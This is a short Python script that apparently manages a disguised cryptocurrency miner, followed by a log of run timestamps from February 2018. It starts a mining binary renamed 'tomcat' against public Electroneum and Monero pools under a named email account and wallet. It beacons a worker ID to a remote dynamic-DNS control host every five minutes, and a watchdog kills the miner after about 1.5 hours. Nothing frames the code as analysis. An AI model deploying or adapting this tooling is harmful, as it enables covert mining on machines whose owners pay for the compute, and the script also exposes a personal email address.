import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:04.899052
#2018-02-17 17:10:08.071529
#2018-02-17 18:58:04.118999
#2018-02-17 20:44:07.766038
#2018-02-17 22:31:06.044561
#2018-02-18 00:14:07.458733
#2018-02-18 02:06:01.828593
#2018-02-18 03:56:04.942176
#2018-02-18 05:44:07.242979
#2018-02-18 07:37:03.969621
#2018-02-18 09:24:07.216234
#2018-02-18 11:10:05.896038
#2018-02-18 12:56:06.762037
#2018-02-18 14:43:05.917823
#2018-02-18 16:33:07.259027
#2018-02-18 18:22:01.458474
#2018-02-18 20:08:03.842517
#2018-02-18 21:55:06.271705
#2018-02-18 23:44:06.090785
#2018-02-19 01:30:08.040399
#2018-02-19 03:19:03.532353
#2018-02-19 05:04:01.915168
#2018-02-19 06:48:06.505200
#2018-02-19 08:37:05.676181
#2018-02-19 10:26:05.982340
#2018-02-19 12:14:05.051847
#2018-02-19 14:01:08.383952
#2018-02-19 15:50:10.954527
#2018-02-19 17:40:01.293740
#2018-02-19 19:27:01.593553
#2018-02-19 21:13:05.604249
#2018-02-19 23:01:07.273143
#2018-02-20 00:45:06.356969
#2018-02-20 02:38:06.949814
#2018-02-20 04:26:07.393513
#2018-02-20 06:10:07.144421
#2018-02-20 07:55:06.472948
#2018-02-20 09:40:10.334039
#2018-02-20 11:24:09.488367
#2018-02-20 13:11:04.009943
#2018-02-20 14:56:05.308158
#2018-02-20 16:41:02.229170
#2018-02-20 18:27:02.179991
#2018-02-20 20:20:06.950017
#2018-02-20 22:05:08.718058
#2018-02-20 23:47:04.115323
#2018-02-21 01:31:09.517203
#2018-02-21 03:21:04.264853
#2018-02-21 05:08:05.010748
#2018-02-21 06:56:04.100673
#2018-02-21 08:42:06.801486
#2018-02-21 10:29:06.144568
#2018-02-21 12:17:06.335342
#2018-02-21 14:04:05.215468
#2018-02-21 15:48:06.165290
#2018-02-21 17:40:04.136878
#2018-02-21 19:26:01.351729
#2018-02-21 21:13:05.650124
#2018-02-21 23:00:09.356102
#2018-02-22 00:48:08.382268
#2018-02-22 02:35:04.231122
#2018-02-22 04:20:07.995298
#2018-02-22 06:05:09.447024
#2018-02-22 07:50:07.291376
#2018-02-22 09:39:01.242805
#2018-02-22 11:24:06.093173
#2018-02-22 13:11:04.428058
#2018-02-22 15:02:08.527446
#2018-02-22 16:47:05.431469
#2018-02-22 18:33:08.299899
#2018-02-22 20:25:02.944866
#2018-02-22 22:11:07.293970
#2018-02-22 23:57:07.521373
#2018-02-23 01:46:06.386278
#2018-02-23 03:36:08.198615
#2018-02-23 05:22:01.456578
#2018-02-23 07:08:02.118909
#2018-02-23 08:58:04.616691
#2018-02-23 11:16:08.378143
#2018-02-23 13:09:01.761089
#2018-02-23 14:53:08.227326
#2018-02-23 16:43:02.270821
#2018-02-23 18:29:01.550908
#2018-02-23 20:15:04.623532
#2018-02-23 22:04:06.445135
#2018-02-23 23:52:06.568203
#2018-02-24 01:41:03.480198
#2018-02-24 03:32:06.405620
#2018-02-24 05:17:05.019056
#2018-02-24 07:05:01.390458
#2018-02-24 08:52:03.841894
#2018-02-24 10:56:04.970248
#2018-02-24 12:43:01.429097
#2018-02-24 14:32:04.228004
#2018-02-24 16:19:04.082163
#2018-02-24 18:13:05.316208
#2018-02-24 19:58:06.609038
#2018-02-24 21:42:03.883417
#2018-02-25 00:36:06.244139
#2018-02-25 03:33:01.731999
#2018-02-25 07:16:05.393848